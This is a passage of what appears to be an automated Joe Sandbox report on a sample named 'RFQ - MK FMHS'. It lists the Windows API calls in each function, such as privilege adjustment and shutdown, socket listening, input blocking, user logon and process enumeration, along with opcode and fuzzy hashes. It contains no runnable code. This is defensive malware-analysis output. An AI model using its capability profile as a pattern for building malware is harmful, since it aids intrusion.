                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                    • String ID: yZ
                    • API String ID: 1300846289-3798167742
                    • Opcode ID: 754377a64ac8a2cb377b52814e4c4680e9bf7a5f86627851606d3d44f64efba8
                    • Instruction ID: d0f277c09646b9d93efd873380a87c6360ff857a36b686b350d922f61dd97a94
                    • Opcode Fuzzy Hash: 754377a64ac8a2cb377b52814e4c4680e9bf7a5f86627851606d3d44f64efba8
                    • Instruction Fuzzy Hash: 93028471A00205DFDF18DF64DA81AAE7BF5FF44300F5490A9E80AEB255EB32DA51CB91
                    APIs
                      • Part of subcall function 00EC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC8D0D
                      • Part of subcall function 00EC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC8D3A
                      • Part of subcall function 00EC8CC3: GetLastError.KERNEL32 ref: 00EC8D47
                    • ExitWindowsEx.USER32(?,00000000), ref: 00ED549B
                    Strings
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 97c25119347dbf2d16dfee693a7ac082d2b5a0a2fe43f2833caea95ec18885a3
                    • Instruction ID: 3b47332119272f1f43b3bebea50c3e684f708597acd0cd3140f6d98a36eb8229
                    • Opcode Fuzzy Hash: 97c25119347dbf2d16dfee693a7ac082d2b5a0a2fe43f2833caea95ec18885a3
                    • Instruction Fuzzy Hash: 9B014733654A112EF7285678EC4AFBA7258EB01356F242027FC27F22D2DA910C828192
                    Strings
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID: Oa
                    • API String ID: 674341424-3945284152
                    • Opcode ID: 74e7a650a79964a1e8ed0bb6f16f9b7171b531f52c48db8d89d6f862c1388c1a
                    • Instruction ID: 9f64e8c7f2f2d6433cbf2ee6dafd5c82d943ed0071aed796d90101df441f13d5
                    • Opcode Fuzzy Hash: 74e7a650a79964a1e8ed0bb6f16f9b7171b531f52c48db8d89d6f862c1388c1a
                    • Instruction Fuzzy Hash: 93228D715083019FC724EF24C891BAFB7E5AF84714F10A91DF99EA7291DB71EA04CB92
                    APIs
                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00EE65EF
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE65FE
                    • bind.WSOCK32(00000000,?,00000010), ref: 00EE661A
                    • listen.WSOCK32(00000000,00000005), ref: 00EE6629
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE6643
                    • closesocket.WSOCK32(00000000), ref: 00EE6657
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: a679d045020eaa12b4e838267f49c1a5192b30c54b19877768cc1e569d1c8733
                    • Instruction ID: 8330296ce7effc8085e406e371230b33112d0fda3a7cedfba9309f7c16d171b8
                    • Opcode Fuzzy Hash: a679d045020eaa12b4e838267f49c1a5192b30c54b19877768cc1e569d1c8733
                    • Instruction Fuzzy Hash: B221CC312002049FCB00AF25C889B7EB7F9EF88364F109169E91AB73D2CB30AD05CB50
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E719FA
                    • GetSysColor.USER32(0000000F), ref: 00E71A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00E71A61
                      • Part of subcall function 00E71290: DefDlgProcW.USER32(?,00000020,?), ref: 00E712D8
                    Similarity
                    • API ID: ColorProc$LongWindow
                    • String ID:
                    • API String ID: 3744519093-0
                    • Opcode ID: 4cff6b8997b503114627e850308ed001af3a54f1d3b6aaf31b96139cb0c04d31
                    • Instruction ID: 9bffc5bcbe9df5f98d1ff278de3f133aa10bfa683a4c048ebb43728046be5b72
                    • Opcode Fuzzy Hash: 4cff6b8997b503114627e850308ed001af3a54f1d3b6aaf31b96139cb0c04d31
                    • Instruction Fuzzy Hash: ABA16970105788BAD628AB2C6C44DBF359DDF8A359B24F15EF50AFA192DA10DD01E272
                    APIs
                      • Part of subcall function 00EE80A0: inet_addr.WSOCK32(00000000), ref: 00EE80CB
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00EE6AB1
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE6ADA
                    • bind.WSOCK32(00000000,?,00000010), ref: 00EE6B13
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE6B20
                    • closesocket.WSOCK32(00000000), ref: 00EE6B34
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    • Opcode ID: 1ba7b5548406c9ef0d9eb6ddebecc60a0f56f1edc1a1724af323fd419d00bb8a
                    • Instruction ID: 5cd3399b225efbb0fae93ff0ac14b1c97ab30a6959e18818a6a51503673692f7
                    • Opcode Fuzzy Hash: 1ba7b5548406c9ef0d9eb6ddebecc60a0f56f1edc1a1724af323fd419d00bb8a
                    • Instruction Fuzzy Hash: 0E418275640214AFEB10AB649D86F7E77E5DF84720F04D058FA1ABB3D3DA709D018B91
                    APIs
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: ff0e8659ed2d99806cc2eda389b0d000e82400803c713c15072bc38f97516c91
                    • Instruction ID: 014f499e43d330ddd2c0a91800ed1fef43ab8598299eb7150fbc15d2fe633f73
                    • Opcode Fuzzy Hash: ff0e8659ed2d99806cc2eda389b0d000e82400803c713c15072bc38f97516c91
                    • Instruction Fuzzy Hash: AC11B6323009155FD7115F26DC44B7F7798EF94721B469429E71AF7241CB309901CA95
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00EB1D88,?), ref: 00EEC312
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EEC324
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: e152b9e32328f4163f516240563595bd4693c1b84d5e78c1d8ce929e6f813d71
                    • Instruction ID: f19106fdc89d47aaf0988682bfd1a8eb89f23c704f17425cc18ea9297fb8509f
                    • Opcode Fuzzy Hash: e152b9e32328f4163f516240563595bd4693c1b84d5e78c1d8ce929e6f813d71
                    • Instruction Fuzzy Hash: 49E0C270200317CFCB304F2BD804A9676E4EF48709B90D479E895F2310E770D842CB60
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00EEF151
                    • Process32FirstW.KERNEL32(00000000,?), ref: 00EEF15F
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                    • Process32NextW.KERNEL32(00000000,?), ref: 00EEF21F
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00EEF22E
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    • Opcode ID: 475dcff6d509da2f67fa074208ceb17ad0670c8e5dccc60a0c0f7c442bfbf0a0
                    • Instruction ID: 69bf57b987b5f34b7f61942af1c465315cd762662c13b28b9d3162ef7b8571c5
                    • Opcode Fuzzy Hash: 475dcff6d509da2f67fa074208ceb17ad0670c8e5dccc60a0c0f7c442bfbf0a0
                    • Instruction Fuzzy Hash: A8517D715043059FD310EF25DC85E6BB7E8FF98710F50982DF599A72A2EB70A908CB92
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00ED40D1
                    • _memset.LIBCMT ref: 00ED40F2
                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00ED4144
                    • CloseHandle.KERNEL32(00000000), ref: 00ED414D
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle_memset
                    • String ID:
                    • API String ID: 1157408455-0
                    • Opcode ID: a2a5b293e03e1b33f90e47453ef068324d88352521f547d8ad3c4138881ff13d
                    • Instruction ID: e7f9e24d89909f84eda4927200f473095ccf1047cefca1e598fc7dfad1b4e046
                    • Opcode Fuzzy Hash: a2a5b293e03e1b33f90e47453ef068324d88352521f547d8ad3c4138881ff13d
                    • Instruction Fuzzy Hash: 5C11AB759012287AD7305BA59C4DFABBB7CEF84764F1041A6F908E7290D6744E84CBA4
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00ECEB19
                    Strings
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    • Opcode ID: aecd9245ff34834a100e2844a13cd7c5fde9bb6e1f1ef8bda9d6858e5b5d5d9c
                    • Instruction ID: 614e44b1dac72dcfc8f0015c4eaeb52e1ad19fa5bbe6b7a5748f0dabd38bf717
                    • Opcode Fuzzy Hash: aecd9245ff34834a100e2844a13cd7c5fde9bb6e1f1ef8bda9d6858e5b5d5d9c
                    • Instruction Fuzzy Hash: AD322575A006059FCB28CF19C581EAAB7F1FF48310B15D56EE89AEB3A1D771E942CB40
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00EE26D5
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EE270C
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: 793616ee027bbcf0f181a3138e82067b426cb90d2cb162ed5df7797ecde75741
                    • Instruction ID: 5b3376bfb26505a21f32c4d64c0a1bb6e6195bd4fb0d0b7c7cd3aa93bb0a805b
                    • Opcode Fuzzy Hash: 793616ee027bbcf0f181a3138e82067b426cb90d2cb162ed5df7797ecde75741
                    • Instruction Fuzzy Hash: 6541D57190024EBFEB20DE96DC85EBBB7FCEB40758F10506EF705B6140EA719E419654
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EDB5AE
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EDB608
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00EDB655
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: 16ea95d2af758aa843e38304d5037bc448d2806e2219c6bfb602b3c5e4e31e41
                    • Instruction ID: 836378fab2864bdac97aeba4f358821aaee722dbda413ed28bda10d639744313
                    • Opcode Fuzzy Hash: 16ea95d2af758aa843e38304d5037bc448d2806e2219c6bfb602b3c5e4e31e41
                    • Instruction Fuzzy Hash: 2B216235A00118EFCB00DF55D880EADBBF8FF88310F1480AAE905AB352DB319916CF51
                    APIs
                      • Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
                      • Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC8D0D
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC8D3A
                    • GetLastError.KERNEL32 ref: 00EC8D47
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: 838f4dbb95285939a5de2524ddecfb5e6d4f93ef5b817c026218593a34997798
                    • Instruction ID: 7b0e31f35bf6be88041e24455408a00d80ccf44128a59f8e07e0f9cbc6685f5f
                    • Opcode Fuzzy Hash: 838f4dbb95285939a5de2524ddecfb5e6d4f93ef5b817c026218593a34997798
                    • Instruction Fuzzy Hash: 10116DB1514209AFD7289F54DE85D6BBBFCEB44710B20852EF456A2241EF31AC418B60
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00ED4C2C
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00ED4C43
                    • FreeSid.ADVAPI32(?), ref: 00ED4C53
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 7ee9dce70d9ed97a9b7f2c9c0dca0239eee95fe2dccadad5d83dac8acab15ae4
                    • Instruction ID: 671c71b2a301a32525eab2a65aa8df202d090b04bb2b742b9f98d632a293d196
                    • Opcode Fuzzy Hash: 7ee9dce70d9ed97a9b7f2c9c0dca0239eee95fe2dccadad5d83dac8acab15ae4
                    • Instruction Fuzzy Hash: E4F03775A11208BFDB04DFE09C89ABEBBB8EF08201F0044A9E905E2281E6706A088B50
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 147afd07824607f10450f189fc59996da27b4d9676b5cc1da13ec512d6562e08
                    • Instruction ID: 994b4e574aeec706a294ae2e4fa253f1851049477479d7f9424e60d9a35fab19
                    • Opcode Fuzzy Hash: 147afd07824607f10450f189fc59996da27b4d9676b5cc1da13ec512d6562e08
                    • Instruction Fuzzy Hash: 3D228D74A00216DFDB24DF64C481AAABBF1FF08304F14D1A9E85ABB351E735AD85CB91
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00EDC966
                    • FindClose.KERNEL32(00000000), ref: 00EDC996
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 25273a6558c6ff5d7a3a17bec0fd11a084b5b2002ed65acc075d081338416d5d
                    • Instruction ID: 4a7d9757ca57d1f3ed5acc12c8a0967ea89ad363cd917b0a61e6392d7ed9505a
                    • Opcode Fuzzy Hash: 25273a6558c6ff5d7a3a17bec0fd11a084b5b2002ed65acc075d081338416d5d
                    • Instruction Fuzzy Hash: 34115E726106009FDB10EF29D855A2AF7E9EF84324F10955EF9A9E73A1DB30AC05CB81
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00EE977D,?,00EFFB84,?), ref: 00EDA302
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00EE977D,?,00EFFB84,?), ref: 00EDA314
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: c3f0b4f9b6cfe575ee754285653382f869a12a6a8e91a9f8eaed092536444aa7
                    • Instruction ID: 6aac9e024ea3193759e6b5ec6c4eedb8abd3fa0ba0a5655a25aa8146bd4c24fa
                    • Opcode Fuzzy Hash: c3f0b4f9b6cfe575ee754285653382f869a12a6a8e91a9f8eaed092536444aa7
                    • Instruction Fuzzy Hash: C0F0823554522DABEB209FA4CC48FEA776DFF09761F008166F908E6291D6309A44CBA1
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EC8851), ref: 00EC8728
                    • CloseHandle.KERNEL32(?,?,00EC8851), ref: 00EC873A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    • Opcode ID: 5e16b46768f34ddaba963a73b6cb40fde64ffbfecab06688d75e55e08dcabe29
                    • Instruction ID: 3a7e1b37296ca40ed1030ff67921264bad7f8c20cba5186bac23eafa8e71467f
                    • Opcode Fuzzy Hash: 5e16b46768f34ddaba963a73b6cb40fde64ffbfecab06688d75e55e08dcabe29
                    • Instruction Fuzzy Hash: 8BE08C32000601EFEB212B21ED08E737BE9EF00390724893DF4A6D0430DB23AC90EB10
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E98F97,?,?,?,00000001), ref: 00E9A39A
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E9A3A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: d3a1533923a4355211e04f1c234620765ef3e9a8ba2030be9860e3f392d27f1b
                    • Instruction ID: 898a0f0a8d82cde60c61cbfe15c3982d9f87859cfd1fe2a200c39f023561fcc0
                    • Opcode Fuzzy Hash: d3a1533923a4355211e04f1c234620765ef3e9a8ba2030be9860e3f392d27f1b
                    • Instruction Fuzzy Hash: 1DB09231055208AFCA102B92EC09BA83F6AEF84AA2F404020F60D94060EB625454CA95
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 17b0df1f3d3cf0f75fd7b06608c2d97b4929385d1070cf5eb02f056ac87af66b
                    • Instruction ID: 0bdc4877c84d47f63c596da6b0c3431c895fa5e12972ce2df737262353e7dad0
                    • Opcode Fuzzy Hash: 17b0df1f3d3cf0f75fd7b06608c2d97b4929385d1070cf5eb02f056ac87af66b
                    • Instruction Fuzzy Hash: 55321562D69F054DDB23A634D832336B248AFB73D4F15E737E819F59AAEB28D4835100
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 260ac2c6e0349d2853333388215821b06d7d33938266ba421d52f8139d747ebb
                    • Instruction ID: b0c45ff74c3257430dff48638cc421c35fe2200d2c55e16288a5784cf2f9ad5a
                    • Opcode Fuzzy Hash: 260ac2c6e0349d2853333388215821b06d7d33938266ba421d52f8139d747ebb
                    • Instruction Fuzzy Hash: 95B1FF20E2AF454DD32396398831336BA9CBFBB2D5F52D71BFC2674D62EB2285835141
                    APIs
                    • __time64.LIBCMT ref: 00ED8B25
                      • Part of subcall function 00E9543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00ED91F8,00000000,?,?,?,?,00ED93A9,00000000,?), ref: 00E95443
                      • Part of subcall function 00E9543A: __aulldiv.LIBCMT ref: 00E95463
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID:
                    • API String ID: 2893107130-0
                    • Opcode ID: 734b383ad7d7dab20506a125d6c9f4be273cebcd9f43e783a7dcc2abac1e87cd
                    • Instruction ID: 97bc6d92407ff2a56ed0708dd5f2f97723bbd857ecc88d3c7e314c3683c8788e
                    • Opcode Fuzzy Hash: 734b383ad7d7dab20506a125d6c9f4be273cebcd9f43e783a7dcc2abac1e87cd
                    • Instruction Fuzzy Hash: 4E21E472635614CFC729CF29D841B52B3E1EBA4321B289E6DD0F5CB2D0CA34B945DB94
                    APIs
                    • BlockInput.USER32(00000001), ref: 00EE4218
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    • Opcode ID: fa8d6dea60c33dbede4449766e45a20c689f2851844633a8fee59051f570c311
                    • Instruction ID: 444afd6b7b122cc6707724f159413acdd514ac82b50304e12d24871aa77944b6
                    • Opcode Fuzzy Hash: fa8d6dea60c33dbede4449766e45a20c689f2851844633a8fee59051f570c311
                    • Instruction Fuzzy Hash: 2DE04FB12402189FC710EF5AD844A9AF7E8AF98760F01D026FD49E7362DA70E841CBA0
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00ED4F18
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    • Opcode ID: 1a5f2d0e1fe863591ba48da53189093789085f8c1229fa1c0dc071204283737f
                    • Instruction ID: 6911663978468385fb8ac7df73d0ffe2ee4c1afca8cd9d81a0fb8cef29ced08d
                    • Opcode Fuzzy Hash: 1a5f2d0e1fe863591ba48da53189093789085f8c1229fa1c0dc071204283737f
                    • Instruction Fuzzy Hash: FAD05EF03642053FFC284B20AC0FFB60208E3A0785F84798B7201B96E1A8F16C02E035
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EC88D1), ref: 00EC8CB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    • Opcode ID: cb7c75202da57eb49d2b1ba1b5b3abefb729d515240fb66c60f67b179cf06eaa
                    • Instruction ID: 6a6306f716ffbc54628e2d296d6a4cb36a7b222ab39ffd0a6fa98da841a7433d
                    • Opcode Fuzzy Hash: cb7c75202da57eb49d2b1ba1b5b3abefb729d515240fb66c60f67b179cf06eaa
                    • Instruction Fuzzy Hash: ABD05E3226050EAFEF018EA4DC01EBE3B69EB04B01F408111FE15D50A1C775D835EB60
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 00EB2242
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 1c461672cfc400a9934ee4e39a23955952f0f3670763bd1937c68470dac843d8
                    • Instruction ID: bef88859a715bdbd02b822b5612ab5575e4f15a98092b5b8965cdf3cb3ed9353
                    • Opcode Fuzzy Hash: 1c461672cfc400a9934ee4e39a23955952f0f3670763bd1937c68470dac843d8
                    • Instruction Fuzzy Hash: E6C002B1810109DBDB05DB90D998DEA77BCAB04314F504095A101B2100DA749B448A61
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E9A36A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 41b2f2f19c0d3802d0cd7f3b6cd2abe2bdbdbd7ffb1f17cfaf0d6c4c8a32b92d
                    • Instruction ID: aa7aabf9fa592efd86b9ab76201eb1045df34d03a1a7d742b7b0972e56258830
                    • Opcode Fuzzy Hash: 41b2f2f19c0d3802d0cd7f3b6cd2abe2bdbdbd7ffb1f17cfaf0d6c4c8a32b92d
